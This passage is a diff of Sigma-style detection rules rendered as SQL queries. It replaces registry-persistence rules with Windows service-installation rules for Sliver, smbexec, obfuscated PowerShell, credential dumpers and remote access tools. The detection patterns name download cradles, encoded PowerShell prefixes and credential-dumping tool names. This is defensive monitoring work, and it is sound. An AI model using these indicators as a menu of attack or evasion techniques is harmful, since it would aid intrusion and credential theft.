"experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ "attack.lateral_movement", - "attack.t1105" + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.002" + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the anydesk tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1137.002" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Windows Service Terminated With Error", + "id": "acfa2210-0d71-4eeb-b477-afab494d596c", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" + "False positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7023')" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_terminated_error_generic.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "status": "experimental", + "description": "Detects PAExec service installation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control 